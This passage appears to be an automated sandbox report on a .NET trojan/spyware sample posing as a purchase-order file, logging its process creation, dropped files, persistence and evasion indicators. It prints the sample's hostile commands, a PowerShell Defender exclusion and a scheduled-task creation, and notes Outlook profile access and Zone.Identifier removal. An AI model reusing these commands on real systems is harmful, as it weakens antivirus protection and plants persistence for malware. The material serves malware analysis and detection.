                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.289411327.0000000004092000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOaCZByYRZIaXaKflASJVDoK.exe4 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOaCZByYRZIaXaKflASJVDoK.exe4 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000008.00000000.278239975.0000000000378000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSZArrayEnumera.exe6 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000000.279735908.00000000007B8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSZArrayEnumera.exe6 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOaCZByYRZIaXaKflASJVDoK.exe4 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.512965723.0000000000B58000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exeBinary or memory string: OriginalFilenameSZArrayEnumera.exe6 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: NpPgfycY.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: jVULYR.exe.9.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: Purchase order 450080088 proj. Allt Charnan.exeVirustotal: Detection: 37%
                    Source: Purchase order 450080088 proj. Allt Charnan.exeReversingLabs: Detection: 61%
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeJump to behavior
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe "C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe"
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe "C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe"
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe "C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exeJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: C:\Users\user\AppData\Roaming\NpPgfycY.exeJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: C:\Users\user\AppData\Local\Temp\tmp86F3.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@23/16@12/3
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_01
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: NpPgfycY.exe.0.dr, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: NpPgfycY.exe.0.dr, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.0.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.0.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.2.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.2.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.1.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.1.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: SZArrayEnumera.pdb source: jVULYR.exe, jVULYR.exe, 00000019.00000000.348771513.00000000009B2000.00000002.00000001.01000000.00000009.sdmp, jVULYR.exe, 0000001D.00000000.371444039.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, jVULYR.exe.9.dr, NpPgfycY.exe.0.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: NpPgfycY.exe.0.dr, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.2.unpack, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.1.unpack, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.3.unpack, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.0.unpack, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.2.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.0.unpack, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: jVULYR.exe.9.dr, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D48DEE pushad ; retf 0_2_02D48DEF
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D490DC pushad ; retf 0_2_02D490DD
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_07AA65E5 push edi; retf 0_2_07AA65E6
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_07AA4AD5 push edx; iretd 0_2_07AA4AD6
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_00FC2F10 push ss; retf 9_2_00FC2F3D
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B9A25 push ss; retf 9_2_064B9A27
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B072C push 0000001Ah; retf 9_2_064B072E
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B3330 push es; iretd 9_2_064B41D0
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B3330 push es; iretd 9_2_064B41E0
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B2C74 push 0000001Ah; retf 9_2_064B2C76
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064BDCE5 push 0000001Ah; retf 9_2_064BDCE7
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B18F6 push es; ret 9_2_064B1910
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B18AA push es; ret 9_2_064B18C4
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B18BD push es; ret 9_2_064B18C4
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B2177 push edi; retn 0000h9_2_064B2179
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B1909 push es; ret 9_2_064B1910
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B41D9 push es; iretd 9_2_064B41E0
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B41D1 push es; iretd 9_2_064B41D8
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B15F7 push 0000001Ah; retf 9_2_064B15F9
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_01278DEE pushad ; retf 20_2_01278DEF
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_012790DC pushad ; retf 20_2_012790DD
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_05183F76 push edi; iretd 20_2_05183F77
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_08CD348D push edx; iretd 20_2_08CD348E
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011AA64B pushad ; retf 23_2_011AA64C
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A8DEE pushad ; retf 23_2_011A8DEF
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A90DC pushad ; retf 23_2_011A90DD
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A981A pushfd ; iretd 23_2_011A981E
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_08D5348D push edx; iretd 23_2_08D5348E
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_05799990 push 0000001Ah; retf 25_2_05799992
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0579985B push 0000001Ah; retf 25_2_05799866
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_06344B0B push ss; retf 25_2_06344B0D
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.75961172037
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.75961172037
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.75961172037
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exeJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exeJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exeJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exeJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: C:\Users\user\AppData\Roaming\NpPgfycY.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jVULYRJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jVULYRJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile opened: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
